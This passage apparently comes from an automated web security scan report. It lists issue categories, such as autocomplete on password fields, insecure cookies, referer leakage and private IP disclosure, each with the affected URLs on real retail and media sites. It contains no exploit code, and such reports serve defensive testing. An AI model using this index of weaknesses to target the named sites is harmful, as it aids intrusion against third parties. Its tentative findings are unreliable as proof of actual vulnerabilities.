16.117. http://secureshopping.mcafee.com/images/footer-search-right.gif
16.118. http://secureshopping.mcafee.com/images/logo.gif
16.119. http://secureshopping.mcafee.com/images/nav-menu-bg.gif
16.120. http://secureshopping.mcafee.com/images/nav-menu-left.gif
16.121. http://secureshopping.mcafee.com/images/nav-menu-right.gif
16.122. http://secureshopping.mcafee.com/images/nav-menu-split.gif
16.123. http://secureshopping.mcafee.com/images/nav-menu-tab-bg.gif
16.124. http://secureshopping.mcafee.com/images/nav-menu-tab-left.gif
16.125. http://secureshopping.mcafee.com/images/nav-menu-tab-right.gif
16.126. http://secureshopping.mcafee.com/images/nav-search-bg.gif
16.127. http://secureshopping.mcafee.com/js/core.js
16.128. http://secureshopping.mcafee.com/js/ga_init.js
16.129. http://secureshopping.mcafee.com/js/ga_track_click.js
16.130. http://secureshopping.mcafee.com/js/ga_track_click_init.js
16.131. http://secureshopping.mcafee.com/js/google_ads_7409232867.js
16.132. http://segment-pixel.invitemedia.com/pixel
16.133. http://sitelife.usatoday.com/ver1.0/Content/images/no-user-image.gif
16.137. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png
16.138. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-background.png
16.141. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif
16.142. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-blocked.gif
16.143. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-default.gif
16.144. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg
16.145. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg.jpg
16.146. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-last-bg.png
16.147. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-next-bg.png
16.148. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-left.png
16.149. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-right.png
16.153. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber.gif
16.154. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber_circle.gif
16.155. http://sitelife.usatoday.com/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif
16.156. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif
16.158. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif
16.159. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif
16.160. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif
16.161. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif
16.162. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif
16.163. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif
16.164. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif
16.165. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif
16.166. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif
16.167. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif
16.168. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif
16.169. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif
16.170. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/checkplayer.js
16.171. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flXHR.js
16.172. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flensed.js
16.173. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js
16.174. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js
16.175. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/swfobject.js
16.176. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/pluckApps.js
16.177. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif
16.178. http://sitelife.usatoday.com/ver1.0/USAT/pluck/comments/comments.css
16.179. http://sitelife.usatoday.com/ver1.0/USAT/pluck/pluck.css
16.180. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app
16.181. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js
16.182. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js
16.183. http://sony.tcliveus.com/i
16.184. http://sync.mathtag.com/sync/img
16.185. http://t.invitemedia.com/track_imp
16.186. http://tag.admeld.com/ad/js/201/unitedstates/728x90/ros
16.187. http://tag.contextweb.com/TagPublish/getad.aspx
16.188. http://tags.bluekai.com/site/2948
16.189. http://tags.bluekai.com/site/3358
16.190. http://web.aisle7.net/jsapi/1.0/content.js
16.191. http://webtrends.telegraph.co.uk/dcsshgbi400000gscd62rrg43_4o2o/dcs.gif
16.192. http://www.imiclk.com/cgi/r.cgi
16.193. http://www.mcafeesecure.com/ads/1002/25
16.194. https://www.mcafeesecure.com/RatingVerify
16.195. http://www.orbitz.com/favicon.ico
16.196. http://www.passporterboards.com/forums/
16.198. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy
16.199. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
16.200. https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout
17. Password field with autocomplete enabled
17.1. http://disneycruise.disney.go.com/reservations/customize
17.2. http://localhost:50386/hoyt/Sitefinity/Startup
17.3. http://shoprunner.force.com/content/JsContentElementsGNC
17.4. http://shoprunner.force.com/content/JsContentElementsPET
17.5. https://www.fingerhut.com/user/login.jsp
17.6. http://www.passporterboards.com/forums/
17.7. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm
17.8. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm
17.9. http://www.viddler.com/file/7d63c65a/html5mobile/
19. Referer-dependent response
19.1. http://a.tribalfusion.com/j.ad
19.2. http://ad.yieldmanager.com/imp
19.3. http://login.dotomi.com/ucm/UCMController
19.4. http://us.playstation.com/uwps/UsplaystationBlogs
19.5. http://www.facebook.com/plugins/like.php
19.6. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm
20.1. http://blog.us.playstation.com/
20.2. http://blog.us.playstation.com/2011/04/26/update-on-playstation-network-and-qriocity/
21. SSL cookie without secure flag set
21.1. https://www.mcafeesecure.com/RatingVerify
21.2. https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout
22. Cross-domain Referer leakage
22.1. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel
22.2. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel.disney
22.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28
22.4. http://ad.doubleclick.net/adi/N4764.cruisecritic/B3091233
22.5. http://ad.doubleclick.net/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18
22.6. http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45
22.7. http://ad.doubleclick.net/adi/ta.cc.com.s/deals
22.8. http://ad.doubleclick.net/adi/ta.cc.com.s/deals
22.9. http://ad.doubleclick.net/adi/ta.cc.com.s/deals
22.10. http://ad.doubleclick.net/adi/ta.cc.com.s/disney
22.11. http://ad.doubleclick.net/adi/ta.cc.com.s/disney
22.12. http://ad.doubleclick.net/adi/ta.cc.com.s/disney
22.13. http://ad.doubleclick.net/adi/x1.dt/dt
22.14. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest
22.15. http://ad.turn.com/server/ads.js
22.16. http://adadvisor.net/adscores/g.js
22.17. http://admeld.adnxs.com/usersync
22.18. http://bh.contextweb.com/bh/drts
22.19. http://bp.specificclick.net/
22.20. http://choices.truste.com/ca
22.21. http://cm.g.doubleclick.net/pixel
22.22. http://cm.g.doubleclick.net/pixel
22.23. http://cm.g.doubleclick.net/pixel
22.24. http://cm.g.doubleclick.net/pixel
22.26. http://disneycruise.disney.go.com/reservations/customize
22.27. http://f.nexac.com/e/a-677/s-2140.xgi
22.28. http://f.nexac.com/e/a-677/s-2140.xgi
22.29. http://fls.doubleclick.net/activityi
22.30. http://fls.doubleclick.net/activityi
22.31. http://fls.doubleclick.net/activityi
22.32. http://fls.doubleclick.net/activityi
22.33. http://fls.doubleclick.net/activityi
22.34. http://fls.doubleclick.net/activityi
22.35. http://fls.doubleclick.net/activityj
22.36. http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH
22.37. http://googleads.g.doubleclick.net/pagead/ads
22.38. http://googleads.g.doubleclick.net/pagead/ads
22.39. http://googleads.g.doubleclick.net/pagead/ads
22.40. http://googleads.g.doubleclick.net/pagead/ads
22.41. http://googleads.g.doubleclick.net/pagead/ads
22.42. http://googleads.g.doubleclick.net/pagead/ads
22.43. http://googleads.g.doubleclick.net/pagead/ads
22.44. http://googleads.g.doubleclick.net/pagead/ads
22.45. http://googleads.g.doubleclick.net/pagead/ads
22.46. http://googleads.g.doubleclick.net/pagead/ads
22.47. http://serv.adspeed.com/ad.php
22.48. http://sony.links.channelintelligence.com/pages/prices.asp
22.49. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx
22.50. http://wow.weather.com/weather/wow/module/USNY0400
22.51. http://www.bhphotovideo.com/bnh/controller/home
22.52. http://www.cruisecritic.com/reviews/cruiseline.cfm
22.53. http://www.facebook.com/plugins/like.php
22.54. http://www.facebook.com/plugins/likebox.php
22.55. http://www.google.com/search
22.56. http://www.google.com/search
22.57. http://www.google.com/search
22.58. http://www.google.com/trends/hottrends
22.59. http://www.imiclk.com/cgi/r.cgi
22.61. http://www.mcafeesecure.com/Link.sa
22.62. http://www.mcafeesecure.com/Link.sa
22.63. http://www.mcafeesecure.com/Link.sa
22.64. https://www.mcafeesecure.com/RatingVerify
22.65. https://www.mcafeesecure.com/us/legalinfo.jsp
22.67. http://www.popularmedia.net/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5
22.68. http://www.siteadvisor.com/download/windows.html
22.69. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay
22.70. http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay
22.71. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYCTOProcess
22.72. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy
22.73. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
22.74. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm
22.75. https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout
22.76. https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
23. Cross-domain script include
23.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28
23.2. http://ad.doubleclick.net/adi/ta.cc.com.s/disney
23.3. http://ad.turn.com/server/ads.js
23.4. http://blog.us.playstation.com/
23.5. http://blog.us.playstation.com/2011/04/26/update-on-playstation-network-and-qriocity/
23.6. http://cdn5.tribalfusion.com/media/1956006/frame.html
23.8. http://disneycruise.disney.go.com/reservations/customize
23.9. http://fls.doubleclick.net/activityi
23.10. http://fls.doubleclick.net/activityi
23.11. http://fls.doubleclick.net/activityi
23.12. http://googleads.g.doubleclick.net/pagead/ads
23.13. http://googleads.g.doubleclick.net/pagead/ads
23.14. http://googleads.g.doubleclick.net/pagead/ads
23.15. http://i.usatoday.net/_common/_scripts/_oas/google.js
23.16. http://pastebin.com/trends
23.18. http://secureshopping.mcafee.com/
23.19. http://sony.links.channelintelligence.com/pages/prices.asp
23.21. http://www.cruisecritic.com/reviews/cruiseline.cfm
23.22. http://www.facebook.com/plugins/like.php
23.23. http://www.facebook.com/plugins/likebox.php
23.24. http://www.fingerhut.com/
23.25. https://www.fingerhut.com/user/login.jsp
23.26. http://www.guitarcenter.com/Includes/GuitarCenter/Scripts/minified/JS_Header.js
23.27. http://www.magicalkingdoms.com/blog/category/disneyland-paris/
23.28. http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp
23.29. https://www.mcafeesecure.com/RatingVerify
23.30. https://www.mcafeesecure.com/favicon.ico
23.32. http://www.siteadvisor.com/download/windows.html
23.33. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay
23.34. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYCTOProcess
23.35. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy
23.36. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
23.37. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm
23.38. https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
23.41. http://www.viddler.com/file/7d63c65a/html5mobile/
24.1. http://ads.pubmatic.com/
24.2. http://bh.contextweb.com/
24.4. http://image2.pubmatic.com/
24.5. http://imawow.weather.com/
24.6. http://login.dotomi.com/
24.7. http://optimized-by.rubiconproject.com/
24.8. http://pixel.rubiconproject.com/
24.10. http://secure-us.imrworldwide.com/
24.11. http://track.pubmatic.com/
24.12. http://travel.travelocity.com/
24.14. http://webassets.scea.com/
24.15. http://widgets.outbrain.com/
24.16. http://wow.weather.com/
24.17. http://www.magicalkingdoms.com/
25.1. http://blog.us.playstation.com/wp-content/themes/twenty11/js/facebox.js
25.2. http://disneycruise.disney.go.com/reservations/customize
25.3. http://i.usatoday.net/_common/_scripts/jquery.cookie.js
25.4. http://i.usatoday.net/asp/uas3/uas.jquery.plugins.js
25.5. http://secureshopping.mcafee.com/
25.6. http://shop.pacsun.com/js_external/PS_external_validation.js
25.7. http://shoprunner.force.com/content/JsContentElementsGNC
25.8. http://shoprunner.force.com/content/JsContentElementsPET
25.9. http://static.bhphotovideo.com/FrameWork/js/common.js
25.10. http://static.bhphotovideo.com/FrameWork/js/jquery/jquery.styledDropdown.min.js
25.11. http://widgets.outbrain.com/OutbrainRater.js
25.12. http://www.acehardware.com/js/LIB_core.js
25.13. http://www.cruisecritic.com/js/global.js
25.14. http://www.fingerhut.com/js/jquery.cookie.js
25.15. https://www.fingerhut.com/js/jquery.cookie.js
25.16. http://www.guitarcenter.com/Includes/GuitarCenter/Scripts/minified/JS_Header.js
25.17. http://www.guitarcenter.com/Includes/Guitarcenter/Guitarcenter.css
25.18. http://www.helzberg.com/includes/jquery/plugins/jquery.hoverIntent.minified.js
25.19. http://www.magicalkingdoms.com/blog/category/disneyland-paris/
25.21. https://www.mcafeesecure.com/us/legalinfo.jsp
25.22. http://www.passporterboards.com/forums/
25.23. http://www.petsmart.com/js/LIB_core.js
25.24. http://www.restorationhardware.com/assets/js/jquery/plugins/jquery.cookie.js
25.25. http://www.restorationhardware.com/assets/js/jquery/plugins/jquery.pngFix.js
25.26. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js
25.27. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js
25.28. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js
25.29. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js
25.30. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js
25.31. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js
25.32. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm
25.33. http://www.telegraph.co.uk/template/ver1-0/js/jquery.tablesorter.js
25.34. http://www.travelguard.com/WorkArea/java/ektron.js
25.35. http://www.travelguard.com/tgi3/00common/js/tracking/s_code.js
26. Private IP addresses disclosed
26.1. http://api.ak.facebook.com/restserver.php
26.2. http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif
26.3. http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif
26.4. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML
26.5. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
26.6. http://static.ak.fbcdn.net/connect/xd_proxy.php
26.7. http://static.ak.fbcdn.net/connect/xd_proxy.php
26.8. http://static.ak.fbcdn.net/connect/xd_proxy.php
26.9. http://www.facebook.com/extern/login_status.php
26.10. http://www.facebook.com/plugins/like.php
26.11. http://www.facebook.com/plugins/like.php
26.12. http://www.facebook.com/plugins/like.php
26.13. http://www.facebook.com/plugins/like.php
26.14. http://www.facebook.com/plugins/like.php
26.15. http://www.facebook.com/plugins/like.php
26.16. http://www.facebook.com/plugins/like.php
26.17. http://www.facebook.com/plugins/like.php
26.18. http://www.facebook.com/plugins/like.php
26.19. http://www.facebook.com/plugins/like.php
26.20. http://www.facebook.com/plugins/like.php
26.21. http://www.facebook.com/plugins/like.php
26.22. http://www.facebook.com/plugins/like.php
26.23. http://www.facebook.com/plugins/like.php
26.24. http://www.facebook.com/plugins/like.php
26.25. http://www.facebook.com/plugins/like.php
26.26. http://www.facebook.com/plugins/like.php
26.27. http://www.facebook.com/plugins/like.php
26.28. http://www.facebook.com/plugins/like.php
26.29. http://www.facebook.com/plugins/like.php
26.30. http://www.facebook.com/plugins/like.php
26.31. http://www.facebook.com/plugins/like.php
26.32. http://www.facebook.com/plugins/like.php
26.33. http://www.facebook.com/plugins/like.php
26.34. http://www.facebook.com/plugins/like.php
26.35. http://www.facebook.com/plugins/likebox.php
26.36. http://www.google.com/sdch/vD843DpA.dct
26.37. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js
26.38. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js
26.39. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js
26.40. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js
27.1. http://0.gravatar.com/avatar/4c44589c9d078af70f5c8c1c46945e93
27.2. http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/566828221
27.3. http://a.tribalfusion.com/j.ad
27.4. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel.disney
27.5. http://ad.doubleclick.net/ad/N6434.1165.SONY.COM/B4856611.338
27.6. http://ad.turn.com/server/pixel.htm
27.7. http://ahome.disney.go.com/globalelements/chrome.css
27.8. http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
27.9. http://api.ak.facebook.com/restserver.php
27.10. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003017/cw.jsx
27.11. http://b.scorecardresearch.com/b
27.12. http://c7.zedo.com/utils/ecSet.js
27.13. http://cdn.turn.com/server/ddc.htm
27.14. http://cdn5.tribalfusion.com/media/1956006/frame.html
27.15. http://cm.g.doubleclick.net/pixel
27.16. http://content.usatoday.com/asp/usataj/usatajhost.htm
27.17. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx
27.18. http://d.xp1.ru4.com/um
27.19. http://dar.youknowbest.com/
27.20. http://data.adsrvr.org/map/cookie/contextweb
27.21. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote
27.22. http://dcl2.wdpromedia.com/concat/4.39.1.5/css
27.23. http://disneycruise.disney.go.com/reservations/customize
27.24. http://feeds.bbci.co.uk/news/rss.xml
27.25. http://feeds.delicious.com/v2/json/urlinfo/data
27.26. http://fingerhut-www.baynote.net/baynote/tags3/common
27.27. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard
27.28. http://fls.doubleclick.net/activityi
27.29. http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH
27.30. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1034849195/
27.31. http://gs.instantservice.com/geoipAPI.js
27.32. http://https.edge.ru4.com/smartserve/ad
27.33. http://i.usatoday.net/asp/usatly/handler.ashx
27.34. http://images.scanalert.com/meter/www.mcafee.com/55.gif
27.35. http://imawow.weather.com/web/common/wxicons/36/26.gif
27.36. http://l.addthiscdn.com/live/t00/250lo.gif
27.37. http://login.dotomi.com/ucm/UCMController
27.38. http://metrics.fingerhut.com/b/ss/fingerhutcomprod/1/H.21/s03779584402218
27.39. http://metrics.mcafee.com/b/ss/mcafeecomglobal/1/H.21/s06847484195604
27.40. http://metrics.sonystyle.com/b/ss/sonysonystyle2007prod/1/H.19.4/s95522347362719
27.41. http://metrics.us.playstation.com/b/ss/sceablogsprod/1/H.20.3/s87736232713796
27.42. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml
27.43. http://nexus2.ensighten.com/sony/serverComponent.php
27.44. http://odb.outbrain.com/utils/ping.html
27.45. http://pagead2.googlesyndication.com/pagead/imgad
27.46. http://pastebin.com/trends
27.47. http://pixel.invitemedia.com/pubmatic_sync
27.48. http://pubads.g.doubleclick.net/gampad/ads
27.49. http://r.turn.com/r/beacon
27.50. http://rs.instantservice.com/resources/smartbutton/7470/II3_Servers.js
27.51. http://s7.addthis.com/js/250/addthis_widget.js
27.52. http://secureshopping.mcafee.com/
27.53. http://serv.adspeed.com/ad.php
27.54. http://sony.links.channelintelligence.com/pages/prices.asp
27.55. http://sony.links.origin.channelintelligence.com/pages/wl.asp
27.56. http://sony.tt.omtrdc.net/m2/sony/mbox/ajax
27.57. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard
27.58. http://static.ak.fbcdn.net/connect/xd_proxy.php
27.59. http://static.bhphotovideo.com/FrameWork/css/min/reset-fonts-layout.css
27.60. http://sync.mathtag.com/sync/img
27.61. http://t.invitemedia.com/track_imp
27.62. http://tag.admeld.com/ad/js/201/unitedstates/728x90/ros
27.63. http://tag.contextweb.com/TagPublish/getjs.aspx
27.64. http://travel.travelocity.com/favicon.ico
27.66. http://ts.istrack.com/trackingAPI.js
27.67. http://turn.nexac.com/r/pu
27.68. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s02545102506410
27.69. http://w88.go.com/b/ss/wdgwdprodcl,wdgwdprosec,wdgdsec/1/H.22.1/s07427038340829
27.70. http://webassets.scea.com/pscomauth/groups/public/documents/webasset/psn_favicon.ico
27.71. http://wow.weather.com/weather/wow/module/USNY0400
27.72. http://www.bhphotovideo.com/bnh/controller/home
27.73. http://www.cruisecritic.com/reviews/cruiseline.cfm
27.74. http://www.facebook.com/plugins/like.php
27.75. http://www.google-analytics.com/__utm.gif
27.76. http://www.googleadservices.com/pagead/conversion/1034849195/
27.77. http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp
27.78. https://www.mcafeesecure.com/RatingVerify
27.79. http://www.mickeypath.com/id/1304751739.jpg
27.80. http://www.orbitz.com/favicon.ico
27.81. http://www.passporter.com/concierge/ticker/countdown17548-1026.png
27.82. http://www.passporterboards.com/forums/clientscript/vbulletin_important.css
27.83. http://www.popularmedia.net/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5
27.84. http://www.siteadvisor.com/download/windows.html
27.86. http://www.viddler.com/file/7d63c65a/html5mobile/
28.1. https://www.fingerhut.com/fingerhut/assets/images/favicon.ico
28.2. https://www.fingerhut.com/fingerhut/css/sifr-config.jsp
28.3. https://www.fingerhut.com/js/financial-snapshot.jsp
28.4. https://www.fingerhut.com/js/persistent_cart.jsp
28.5. https://www.fingerhut.com/js/sifr.jsp
28.6. https://www.fingerhut.com/user/login.jsp
28.7. https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
29. HTML does not specify charset
29.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28
29.3. http://ad.doubleclick.net/adi/N4764.cruisecritic/B3091233
29.4. http://ad.doubleclick.net/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18
29.5. http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45
29.6. http://ad.doubleclick.net/adi/ta.cc.com.s/deals
29.7. http://ad.doubleclick.net/adi/ta.cc.com.s/disney
29.8. http://ad.doubleclick.net/adi/x1.dt/dt
29.9. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest
29.10. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs
29.11. http://cdn5.tribalfusion.com/media/1956006/frame.html
29.12. http://content.usatoday.com/asp/uas3/uasSignedOut.htm
29.13. http://content.usatoday.com/asp/usataj/usatajhost.htm
29.14. http://d.xp1.ru4.com/um
29.15. http://ds.addthis.com/red/psi/sites/travel.usatoday.com/p.json
29.16. http://f.nexac.com/e/a-677/s-2140.xgi
29.17. http://fls.doubleclick.net/activityi
29.18. http://https.edge.ru4.com/smartserve/ad
29.19. http://odb.outbrain.com/utils/ping.html
29.20. http://ping.chartbeat.net/ping
29.21. http://pixel.invitemedia.com/data_sync
29.22. http://serv.adspeed.com/ad.php
29.23. http://wow.weather.com/weather/wow/module/USNY0400
29.24. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
30. Content type incorrectly stated
30.1. http://6e8d64.r.axf8.net/mr/a.gif
30.2. http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/566828221
30.3. http://blog.us.playstation.com/wp-content/themes/twenty11/images/ps_bg_support_gif.gif
30.4. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs
30.5. http://cdn.gigya.com/js/gigya.services.socialize.plugins.simpleshare.min.js
30.6. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx
30.7. http://eval.bizrate.com/js/survey_126457_1.js
30.8. http://feeds.delicious.com/v2/json/urlinfo/data
30.9. http://fingerhut-www.baynote.net/baynote/tags3/common
30.10. http://gs.instantservice.com/geoipAPI.js
30.11. http://https.edge.ru4.com/smartserve/ad
30.12. http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.aspx
30.15. http://secureshopping.mcafee.com/images/favicon.ico
30.16. http://shop.pacsun.com/js/widget-qv-uc.jsp
30.17. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app
30.18. http://sony.tt.omtrdc.net/m2/sony/mbox/ajax
30.19. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/mbox/standard
30.20. http://sr2.liveperson.net/hcp/html/mTag.js
30.21. http://ts.istrack.com/trackingAPI.js
30.22. http://us.playstation.com/uwps/CookieHandler
30.23. http://webassets.scea.com/pscomauth/groups/public/documents/webasset/psn_favicon.ico
30.24. http://wow.weather.com/weather/wow/module/USNY0400
30.25. http://www.facebook.com/extern/login_status.php
30.26. http://www.fingerhut.com/assets/f/misc/bkgicon.jpg
30.27. http://www.fingerhut.com/fingerhut/assets/images/favicon.ico
30.28. http://www.fingerhut.com/fingerhut/css/sifr-config.jsp
30.29. http://www.fingerhut.com/js/financial-snapshot.jsp
30.30. http://www.fingerhut.com/js/persistent_cart.jsp
30.31. http://www.fingerhut.com/js/sifr.jsp
30.32. https://www.fingerhut.com/fingerhut/assets/images/favicon.ico
30.33. https://www.fingerhut.com/fingerhut/css/sifr-config.jsp
30.34. https://www.fingerhut.com/js/financial-snapshot.jsp
30.35. https://www.fingerhut.com/js/persistent_cart.jsp
30.36. https://www.fingerhut.com/js/sifr.jsp
30.37. http://www.footlocker.com/ns/hp/css/images/FL_Collections_arrow_l.gif
30.38. http://www.passporterboards.com/forums/customavatars/avatar15288_4.gif
30.39. http://www.passporterboards.com/forums/customavatars/avatar17690_3.gif
30.40. http://www.passporterboards.com/forums/customavatars/avatar18759_15.gif
30.41. http://www.passporterboards.com/forums/customavatars/avatar30289_3.gif
30.42. http://www.passporterboards.com/forums/customavatars/avatar3404_4.gif
30.43. http://www.passporterboards.com/forums/customavatars/avatar7184_7.gif
30.44. http://www.passporterboards.com/forums/signaturepics/sigpic1001_7.gif
30.45. http://www.passporterboards.com/forums/signaturepics/sigpic10872_14.gif
30.46. http://www.passporterboards.com/forums/signaturepics/sigpic17690_3.gif
30.47. http://www.passporterboards.com/forums/signaturepics/sigpic18031_10.gif
30.48. http://www.passporterboards.com/forums/signaturepics/sigpic18759_24.gif
30.49. http://www.passporterboards.com/forums/signaturepics/sigpic21228_3.gif
30.50. http://www.passporterboards.com/forums/signaturepics/sigpic3404_109.gif
30.51. http://www.passporterboards.com/forums/signaturepics/sigpic7184_20.gif
30.52. http://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp
30.53. http://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc
31. Content type is not specified
31.1. http://ads.bluelithium.com/st
31.2. http://localhost:50386/favicon.ico
31.3. http://localhost:50386/hoyt.net
31.4. http://localhost:50386/hoyt.net/sitefinity
31.5. http://pcm1.map.pulsemgr.com/uds/pc
31.6. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard
31.7. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
Severity: | High |
Confidence: | Tentative |
Host: | http://dcl.wdpromedia.com |
Path: | /media/dcl_v0400/Global |
